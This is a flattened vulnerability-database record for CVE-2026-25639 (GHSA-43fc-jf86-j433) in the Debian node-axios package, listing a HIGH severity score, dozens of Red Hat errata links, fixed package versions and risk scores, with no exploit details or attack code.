reference_id GHSA-43fc-jf86-j433
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-43fc-jf86-j433
16
reference_url https://access.redhat.com/errata/RHSA-2026:2694
reference_id RHSA-2026:2694
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2694
17
reference_url https://access.redhat.com/errata/RHSA-2026:3087
reference_id RHSA-2026:3087
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3087
18
reference_url https://access.redhat.com/errata/RHSA-2026:3105
reference_id RHSA-2026:3105
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3105
19
reference_url https://access.redhat.com/errata/RHSA-2026:3106
reference_id RHSA-2026:3106
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3106
20
reference_url https://access.redhat.com/errata/RHSA-2026:3107
reference_id RHSA-2026:3107
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3107
21
reference_url https://access.redhat.com/errata/RHSA-2026:3109
reference_id RHSA-2026:3109
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3109
22
reference_url https://access.redhat.com/errata/RHSA-2026:4942
reference_id RHSA-2026:4942
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4942
23
reference_url https://access.redhat.com/errata/RHSA-2026:5142
reference_id RHSA-2026:5142
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:5142
24
reference_url https://access.redhat.com/errata/RHSA-2026:5168
reference_id RHSA-2026:5168
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:5168
25
reference_url https://access.redhat.com/errata/RHSA-2026:5174
reference_id RHSA-2026:5174
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:5174
26
reference_url https://access.redhat.com/errata/RHSA-2026:5636
reference_id RHSA-2026:5636
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:5636
27
reference_url https://access.redhat.com/errata/RHSA-2026:5665
reference_id RHSA-2026:5665
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:5665
28
reference_url https://access.redhat.com/errata/RHSA-2026:5807
reference_id RHSA-2026:5807
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:5807
29
reference_url https://access.redhat.com/errata/RHSA-2026:6170
reference_id RHSA-2026:6170
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6170
30
reference_url https://access.redhat.com/errata/RHSA-2026:6174
reference_id RHSA-2026:6174
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6174
31
reference_url https://access.redhat.com/errata/RHSA-2026:6192
reference_id RHSA-2026:6192
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6192
32
reference_url https://access.redhat.com/errata/RHSA-2026:6277
reference_id RHSA-2026:6277
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6277
33
reference_url https://access.redhat.com/errata/RHSA-2026:6308
reference_id RHSA-2026:6308
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6308
34
reference_url https://access.redhat.com/errata/RHSA-2026:6309
reference_id RHSA-2026:6309
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6309
35
reference_url https://access.redhat.com/errata/RHSA-2026:6404
reference_id RHSA-2026:6404
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6404
36
reference_url https://access.redhat.com/errata/RHSA-2026:6428
reference_id RHSA-2026:6428
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6428
37
reference_url https://access.redhat.com/errata/RHSA-2026:6497
reference_id RHSA-2026:6497
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6497
38
reference_url https://access.redhat.com/errata/RHSA-2026:6567
reference_id RHSA-2026:6567
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6567
39
reference_url https://access.redhat.com/errata/RHSA-2026:6568
reference_id RHSA-2026:6568
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6568
40
reference_url https://access.redhat.com/errata/RHSA-2026:6802
reference_id RHSA-2026:6802
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6802
41
reference_url https://access.redhat.com/errata/RHSA-2026:7249
reference_id RHSA-2026:7249
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:7249
42
reference_url https://access.redhat.com/errata/RHSA-2026:8218
reference_id RHSA-2026:8218
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8218
43
reference_url https://access.redhat.com/errata/RHSA-2026:8229
reference_id RHSA-2026:8229
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8229
44
reference_url https://access.redhat.com/errata/RHSA-2026:8499
reference_id RHSA-2026:8499
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8499
45
reference_url https://access.redhat.com/errata/RHSA-2026:8500
reference_id RHSA-2026:8500
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8500
46
reference_url https://access.redhat.com/errata/RHSA-2026:8501
reference_id RHSA-2026:8501
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8501
fixed_packages
0
url pkg:deb/debian/node-axios@1.14.0%2Bdfsg-1
purl pkg:deb/debian/node-axios@1.14.0%2Bdfsg-1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.14.0%252Bdfsg-1
1
url pkg:deb/debian/node-axios@1.15.0-1
purl pkg:deb/debian/node-axios@1.15.0-1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1
aliases CVE-2026-25639, GHSA-43fc-jf86-j433
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-x41s-g5mh-pkdq
Risk_scorenull
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1